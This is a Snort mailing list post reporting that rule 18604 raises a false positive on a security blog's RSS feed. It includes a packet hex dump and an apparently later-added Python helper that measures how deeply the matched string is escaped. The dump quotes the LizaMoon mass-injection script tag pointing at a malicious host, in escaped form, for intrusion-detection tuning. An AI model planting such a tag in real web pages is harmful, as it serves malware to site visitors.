Snort mailing list archives
FP on 18604
From: "Lay, James" <james.lay () wincofoods com>
Date: Fri, 8 Apr 2011 08:49:06 -0600
Heh...hits on this feed: http://feeds.feedburner.com/SpiderlabsAnterior?format=xml

0000 00 13 72 59 7a f4 00 90 7f 3e f7 90 08 00 45 00  ..rYz....>....E.
0010 05 a0 24 bb 00 00 3a 06 1e cf 4a 7d e3 2c 00 00  ..$...:...J}.,..
0020 00 00 00 50 c2 6c 6b 72 68 d3 41 db c1 f5 50 10  ...P.lkrh.A...P.
0030 19 20 9e 1a 00 00 77 77 77 2e 67 6f 6f 67 6c 65  . ....www.google
0040 2e 63 6f 6d 2f 73 65 61 72 63 68 3f 61 71 3d 66  .com/search?aq=f
0050 26 61 6d 70 3b 61 6d 70 3b 73 6f 75 72 63 65 69  &amp;amp;sourcei
0060 64 3d 63 68 72 6f 6d 65 26 61 6d 70 3b 61 6d 70  d=chrome&amp;amp
0070 3b 69 65 3d 55 54 46 2d 38 26 61 6d 70 3b 61 6d  ;ie=UTF-8&amp;am
0080 70 3b 71 3d 25 32 32 25 33 43 73 63 72 69 70 74  p;q=%22%3Cscript
0090 2b 73 72 63 25 33 44 68 74 74 70 25 33 41 25 32  +src%3Dhttp%3A%2
00a0 46 25 32 46 6c 69 7a 61 6d 6f 6f 6e 2e 63 6f 6d  F%2Flizamoon.com
00b0 25 32 46 75 72 2e 70 68 70 25 33 45 25 33 43 25  %2Fur.php%3E%3C%
00c0 32 46 73 63 72 69 70 74 25 33 45 25 32 32 22 20  2Fscript%3E%22" 
00d0 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 26 67  target="_self"&g
00e0 74 3b 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20  t;Google Search 
00f0 71 75 65 73 74 69 6f 6e 20 66 6f 72 20 4c 69 7a  question for Liz
0100 61 4d 6f 6f 6e 20 70 61 79 6c 6f 61 64 73 26 6c  aMoon payloads&l
0110 74 3b 2f 61 26 67 74 3b 2e 20 c2 a0 48 65 72 65  t;/a&gt;. ..Here
0120 20 69 73 20 73 6f 6d 65 20 65 78 61 6d 70 6c 65   is some example
0130 20 72 61 77 20 68 74 6d 6c 20 6f 66 20 61 20 73   raw html of a s
0140 69 74 65 20 72 65 74 75 72 6e 65 64 20 62 79 20  ite returned by 
0150 74 68 65 20 73 65 61 72 63 68 3a 26 6c 74 3b 2f  the search:&lt;/
0160 70 26 67 74 3b 26 23 78 44 3b 0d 0a 26 6c 74 3b  p&gt;&#xD;..&lt;
0170 70 72 65 26 67 74 3b 26 61 6d 70 3b 6c 74 3b 74  pre&gt;&amp;lt;t
0180 64 20 69 64 3d 22 74 64 44 65 76 65 6c 6f 70 6d  d id="tdDevelopm
0190 65 6e 74 4e 61 6d 65 22 26 61 6d 70 3b 67 74 3b  entName"&amp;gt;
01a0 52 69 79 61 64 20 52 65 73 6f 72 74 20 c2 a0 20  Riyad Resort .. 
01b0 c2 a0 20 c2 a0 26 23 78 44 3b 0d 0a 26 61 6d 70  .. ..&#xD;..&amp
01c0 3b 61 6d 70 3b 6c 74 3b 2f 74 69 74 6c 65 26 61  ;amp;lt;/title&a
01d0 6d 70 3b 61 6d 70 3b 67 74 3b 26 61 6d 70 3b 61  mp;amp;gt;&amp;a
01e0 6d 70 3b 6c 74 3b 73 63 72 69 70 74 20 73 72 63  mp;lt;script src
01f0 3d 68 74 74 70 3a 2f 2f 6c 69 7a 61 6d 6f 6f 6e  =http://lizamoon
0200 2e 63 6f 6d 2f 75 72 2e 70 68 70 26 61 6d 70 3b  .com/ur.php&amp;
0210 61 6d 70 3b 67 74 3b 26 61 6d 70 3b 61 6d 70 3b  amp;gt;&amp;amp;
0220 6c 74 3b 2f 73 63 72 69 70 74 26 61 6d 70 3b 61  lt;/script&amp;a
0230 6d 70 3b 67 74 3b 26 23 78 44 3b 0d 0a 26 61 6d  mp;gt;&#xD;..&am
0240 70 3b 61 6d 70 3b 6c 74 3b 2f 74 69 74 6c 65 26  p;amp;lt;/title&
0250 61 6d 70 3b 61 6d 70 3b 67 74 3b 26 61 6d 70 3b  amp;amp;gt;&amp;
0260 61 6d 70 3b 6c 74 3b 73 63 72 69 70 74 20 73 72  amp;lt;script sr
0270 63 3d 68 74 74 70 3a 2f 2f 6c 69 7a 61 6d 6f 6f  c=http://lizamoo
0280 6e 2e 63 6f 6d 2f 75 72 2e 70 68 70 26 61 6d 70  n.com/ur.php&amp
0290 3b 61 6d 70 3b 67 74 3b 26 61 6d 70 3b 61 6d 70  ;amp;gt;&amp;amp
02a0 3b 6c 74 3b 2f 73 63 72 69 70 74 26 0d 0a 31 30  ;lt;/script&..10
02b0 30 30 0d 0a 61 6d 70 3b 61 6d 70 3b 67 74 3b 26  00..amp;amp;gt;&
02c0 23 78 44 3b 0d 0a 20 47 61 6c 6c 65 72 79 26 61  #xD;.. Gallery&a
02d0 6d 70 3b 6c 74 3b 2f 74 64 26 61 6d 70 3b 67 74  mp;lt;/td&amp;gt
02e0 3b 26 6c 74 3b 2f 70 72 65 26 67 74 3b 26 23 78  ;&lt;/pre&gt;&#x
02f0 44 3b 0d 0a 26 6c 74 3b 70 26 67 74 3b 54 68 69  D;..&lt;p&gt;Thi
0300 73 20 63 6f 64 65 20 64 6f 65 73 20 6e 6f 74 20  s code does not 
0310 65 78 65 63 75 74 65 20 6a 61 76 61 73 63 72 69  execute javascri
0320 70 74 20 62 75 74 20 69 6e 73 74 65 61 64 20 6f  pt but instead o
0330 6e 6c 79 20 72 65 6e 64 65 72 73 20 74 68 65 20  nly renders the 
0340 74 65 78 74 2e 20 c2 a0 49 66 20 74 68 65 20 58  text. ..If the X
0350 53 53 20 73 63 72 69 70 74 20 74 61 67 73 20 77  SS script tags w
0360 65 72 65 20 73 75 63 63 65 73 73 66 75 6c 6c 79  ere successfully
0370 20 69 6e 6a 65 63 74 65 64 2c 20 6d 65 61 6e 69   injected, meani
0380 6e 67 20 74 68 61 74 20 74 68 65 20 61 70 70 73  ng that the apps
0390 20 77 65 72 65 20 6e 6f 74 20 70 72 6f 70 65 72   were not proper
03a0 6c 79 20 6f 75 74 70 75 74 20 65 6e 63 6f 64 69  ly output encodi
03b0 6e 67 2f 65 73 63 61 70 69 6e 67 20 70 61 79 6c  ng/escaping payl
03c0 6f 61 64 73 2c 20 74 68 65 6e 20 74 68 65 20 73  oads, then the s
03d0 65 61 72 63 68 20 65 6e 67 69 6e 65 20 73 70 69  earch engine spi
03e0 64 65 72 73 20 77 6f 75 6c 64 20 6e 6f 74 20 62  ders would not b
03f0 65 20 69 6e 64 65 78 69 6e 67 20 74 68 65 20 73  e indexing the s
0400 6e 69 70 70 65 74 73 20 6f 66 20 63 6f 64 65 2e  nippets of code.
0410 20 c2 a0 54 68 65 20 73 65 61 72 63 68 20 65 6e   ..The search en
0420 67 69 6e 65 73 20 64 6f 20 6e 6f 74 20 69 6e 64  gines do not ind
0430 65 78 20 74 68 65 20 72 61 77 20 68 74 6d 6c 20  ex the raw html 
0440 73 6f 75 72 63 65 20 63 6f 64 65 20 62 75 74 20  source code but 
0450 6f 6e 6c 79 20 74 68 65 20 72 65 6e 64 65 72 65  only the rendere
0460 64 20 74 65 78 74 2e 26 6c 74 3b 2f 70 26 67 74  d text.&lt;/p&gt
0470 3b 26 23 78 44 3b 0d 0a 26 6c 74 3b 70 26 67 74  ;&#xD;..&lt;p&gt
0480 3b 53 6f 2c 20 65 76 65 6e 20 74 68 6f 75 67 68  ;So, even though
0490 20 73 69 74 65 73 20 6c 69 73 74 65 64 20 69 6e   sites listed in
04a0 20 74 68 65 20 73 65 61 72 63 68 20 72 65 73 75   the search resu
04b0 6c 74 73 20 77 65 72 65 20 76 75 6c 6e 65 72 61  lts were vulnera
04c0 62 6c 65 20 74 6f 20 53 51 4c 20 49 6e 6a 65 63  ble to SQL Injec
04d0 74 69 6f 6e 20 61 6e 64 20 63 6f 6d 70 72 6f 6d  tion and comprom
04e0 69 73 65 64 2c 20 74 68 65 79 20 61 63 74 75 61  ised, they actua
04f0 6c 6c 79 20 70 72 65 76 65 6e 74 65 64 20 74 68  lly prevented th
0500 65 20 67 6f 61 6c 20 6f 66 20 74 68 69 73 20 61  e goal of this a
0510 74 74 61 63 6b 20 73 69 6e 63 65 20 74 68 65 20  ttack since the 
0520 77 65 62 20 61 70 70 20 69 73 20 70 72 6f 70 65  web app is prope
0530 72 6c 79 20 6f 75 74 70 75 74 20 65 6e 63 6f 64  rly output encod
0540 69 6e 67 20 74 68 65 20 64 61 74 61 20 73 65 6e  ing the data sen
0550 74 20 74 6f 20 74 68 65 20 63 6c 69 65 6e 74 73  t to the clients
0560 2e 26 6c 74 3b 2f 70 26 67 74 3b 26 23 78 44 3b  .&lt;/p&gt;&#xD;
0570 0d 0a 26 6c 74 3b 68 32 26 67 74 3b 45 6e 73 75  ..&lt;h2&gt;Ensu
0580 72 65 20 70 72 6f 70 65 72 20 4f 75 74 70 75 74  re proper Output
0590 20 45 6e 63 6f 64 69 6e 67 2f 45 73 63 61 70 69   Encoding/Escapi
05a0 6e 67 20 43 6f 76 65 72 61 67 65 26 6c 74        ng Coverage&lt

James
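In the dump above, the string lizamoon.com/ur.php only appears inside feed text that is HTML-entity-escaped (the Spiderlabs post quoting the injected tag as `&amp;lt;script src=...`) or URL-encoded inside a Google search link, so a browser fetching this feed would render it as text rather than load the script. The following Python triage helper is an added example, not code from the post or from the Snort project. It parses a dump in this `snort -X` / `tcpdump -XX` row layout, strips the Ethernet, IPv4 and TCP headers, and reports how many rounds of HTML-entity and URL decoding separate each occurrence of the content string from a literal `<script` tag, so an analyst can tell live markup from escaped text at a glance. The needle string, the function names and the abridged sample dump are my own assumptions; the post does not show the body of rule 18604.

```python
"""Added triage helper (not from the post or the Snort project): parse a
snort/tcpdump -X style hex dump, strip the Ethernet/IPv4/TCP headers, and
show in what encoding context a rule's content string sits."""
import html
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample: rows 0000-0030 are copied from the post (frame headers
# plus the first payload bytes); rows 0040-0080 are made up here, abridged
# from the entity-escaped feed content the post's dump shows. The IPv4 total
# length field therefore does not match this short frame; nothing below
# relies on it.
SAMPLE_DUMP = """\
0000 00 13 72 59 7a f4 00 90 7f 3e f7 90 08 00 45 00  ..rYz....>....E.
0010 05 a0 24 bb 00 00 3a 06 1e cf 4a 7d e3 2c 00 00  ..$...:...J}.,..
0020 00 00 00 50 c2 6c 6b 72 68 d3 41 db c1 f5 50 10  ...P.lkrh.A...P.
0030 19 20 9e 1a 00 00 77 77 77 2e 67 6f 6f 67 6c 65  . ....www.google
0040 2e 63 6f 6d 2f 78 26 67 74 3b 26 61 6d 70 3b 6c  .com/x&gt;&amp;l
0050 74 3b 73 63 72 69 70 74 20 73 72 63 3d 68 74 74  t;script src=htt
0060 70 3a 2f 2f 6c 69 7a 61 6d 6f 6f 6e 2e 63 6f 6d  p://lizamoon.com
0070 2f 75 72 2e 70 68 70 26 61 6d 70 3b 61 6d 70 3b  /ur.php&amp;amp;
0080 67 74 3b                                         gt;
"""

HEX_BYTE = re.compile(r"[0-9a-fA-F]{2}")
OFFSET = re.compile(r"[0-9a-fA-F]{4}")


def parse_hexdump(dump: str) -> bytes:
    """Reassemble raw bytes from rows of the form
    '<offset> <up to 16 hex bytes> <ascii column>'. Rows are keyed by offset,
    so wrapped or reordered rows still come out in order; a gap or overlap
    between rows is reported instead of silently joined."""
    rows = {}
    for line in dump.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not OFFSET.fullmatch(tokens[0]):
            continue
        data = bytearray()
        for tok in tokens[1:17]:          # at most 16 bytes per row
            if not HEX_BYTE.fullmatch(tok):
                break                     # reached the ASCII column
            data.append(int(tok, 16))
        rows[int(tokens[0], 16)] = bytes(data)
    frame = bytearray()
    for offset in sorted(rows):
        if offset != len(frame):
            raise ValueError(f"gap or overlap at offset {offset:#06x}")
        frame += rows[offset]
    return bytes(frame)


def tcp_payload(frame: bytes) -> bytes:
    """Strip Ethernet II, IPv4 and TCP headers. The post's dump starts with
    the MAC addresses, so it is a whole frame, not just the IP packet."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        raise ValueError("not an Ethernet II / IPv4 frame")
    ihl = (frame[14] & 0x0F) * 4          # IPv4 header length in bytes
    if frame[14 + 9] != 6:                # IPv4 protocol field
        raise ValueError("not TCP")
    tcp = 14 + ihl
    data_offset = (frame[tcp + 12] >> 4) * 4
    return frame[tcp + data_offset:]


def decode_rounds(context: str, marker: str = "<script",
                  max_rounds: int = 6) -> Optional[int]:
    """Number of combined HTML-entity + URL decoding rounds needed before
    `marker` appears literally: 0 means the tag is live markup as sent, 1 or
    more means it was escaped (or is a URL parameter) and renders as text,
    None means the marker never appears."""
    text = context
    for rounds in range(max_rounds + 1):
        if marker in text:
            return rounds
        text = unquote(html.unescape(text))
    return None


def triage(dump: str, needle: str = "lizamoon.com/ur.php") -> list:
    """Locate every occurrence of the content string in the TCP payload and
    annotate it with its surrounding text and escape depth."""
    text = tcp_payload(parse_hexdump(dump)).decode("utf-8", errors="replace")
    hits = []
    for m in re.finditer(re.escape(needle), text):
        context = text[max(0, m.start() - 40):m.end() + 20]
        hits.append({"offset": m.start(), "context": context,
                     "decode_rounds": decode_rounds(context)})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_DUMP):
        print(f"payload offset {hit['offset']}: {hit['decode_rounds']} decode "
              f"round(s) before <script is literal; context: {hit['context']!r}")
```

Run on the sample, the single hit needs two decoding rounds before `<script` is literal, which is exactly the signature of a blog post quoting the injected tag inside an XML feed: the content string is present on the wire, so a plain content match fires, but the tag cannot execute where it sits. Pasting the full dump from the post into `SAMPLE_DUMP` works the same way, since the parser only needs the row layout.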
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users